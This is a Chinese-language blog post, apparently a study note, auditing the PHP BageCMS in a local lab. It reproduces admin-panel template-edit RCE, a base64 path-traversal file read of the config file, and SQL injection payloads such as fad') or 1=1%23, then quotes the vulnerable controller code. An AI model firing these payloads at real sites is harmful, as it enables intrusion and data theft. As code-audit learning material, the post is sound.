php代码审计学习----八哥cms代码审计

php代码审计学习----八哥cms代码审计

源码

https://github.com/Betsy0/CMSVulSource/tree/main/bagecms

环境搭建

打开php.ini
全局搜索soap
将extension前的;删掉
创建一个名为bagecms的数据库

create database bagecms;

输入网址/index.php?r=install
完成安装
然后再输入/index.php?r=admini

漏洞复现

1.模板渲染实现RCE
登录进后台

编辑question目录下的index.php


2.任意文件读取
点击提交,抓包

filename进行base64加密

?r=admini/Template/Update&filename=Li4vLi4vLi4vcHJvdGVjdGVkL2NvbmZpZy9tYWluLnBocA==


3.SQL注入

?r=admini/post/index&catalogId=&title=fafadf&titleAlias=fad') or 1=1%23&searchsubmit=查询
?r=admini/post/index&catalogId=&title=fafadf&titleAlias=fad') or 1=2%23&searchsubmit=查询

或者

?r=admini/post/index&titleAlias=fad') or 1=1%23
?r=admini/post/index&titleAlias=fad') or 1=2%23
?r=admini/post/index&title=fad') or 1=1%23
?r=admini/post/index&title=fad') or 1=2%23


代码审计

命令执行代码审计

1.因为是在模板编辑处实现了RCE,所以搜索"模板"

2.定位到编辑这里

/**
     * 编辑
     *
     * @param $id
     */
    public function actionUpdate( $filename ) {
        parent::_acl();
        $filename = trim( $this->_gets->getParam( 'filename' ) );
        $content = trim( $this->_gets->getParam( 'content' ) );
        if ( isset( $_POST['content'] ) ) {
            $fileputcontent = file_put_contents(  $this->_themePath.DS.'views'.DS.XUtils::b64decode( $filename ), $content );
            if ( $fileputcontent == true ) {
                parent::_adminiLogger( array( 'catalog'=>'update', 'intro'=>'编辑模板' ) );
                $this->redirect( array ( 'index' ) );
            }
        }
        $data['filename'] = XUtils::b64decode( $filename );
        $data['content'] = htmlspecialchars( file_get_contents(  $this->_themePath.DS.'views'.DS.XUtils::b64decode( $filename ) ) );
        $this->render( 'update', $data );

    }


在后台编辑模板后发现直接在修改了源码(/themes/default/views/question/index.php)

2.任意文件读取
还是刚才那处
filename路径进行base64加密,所以可以进行目录遍历读取配置文件
遗留问题:?r=admini/template/update是怎么构造出来的
3.SQL注入
可以全局搜索一些常见的SQL语句成分,比如SELECT,LIKE等

    public function actionIndex ()
    {
        parent::_acl();
        $model = new Page();
        $criteria = new CDbCriteria();
        $condition = '1';
        $title = $this->_gets->getParam('title');
        $titleAlias = $this->_gets->getParam('titleAlias');
        $title && $condition .= ' AND title LIKE \'%' . $title . '%\'';
        $titleAlias && $condition .= ' AND title_alias LIKE \'%' . $titleAlias . '%\'';
        $criteria->condition = $condition;
        $criteria->order = 't.id DESC';
        $count = $model->count($criteria);
        $pages = new CPagination($count);
        $pages->pageSize = 13;
        $pageParams = XUtils::buildCondition($_GET, array ('page_name_alias' , 'page_name' ));
        $pages->params = is_array($pageParams) ? $pageParams : array ();
        $criteria->limit = $pages->pageSize;
        $criteria->offset = $pages->currentPage * $pages->pageSize;
        $result = $model->findAll($criteria);
        $this->render('index', array ('datalist' => $result , 'pagebar' => $pages ));
    }

index.php

$(document).ready(function(){
	$("#title").val('<?php echo Yii::app()->request->getParam('title')?>');
	$("#titleAlias").val('<?php echo Yii::app()->request->getParam('titleAlias')?>');
	$("#catalogId").val('<?php echo Yii::app()->request->getParam('catalogId')?>');

没有任何过滤
可以插入') or 1=1%23
至于url可以为,title可以换为titleAlias

r=admini/post/index&title=fad') or 1=1%23

遗留问题:为什么是')闭合,而不是'闭合

posted @ 2023-10-27 21:40  BattleofZhongDinghe  阅读(223)  评论(0编辑  收藏  举报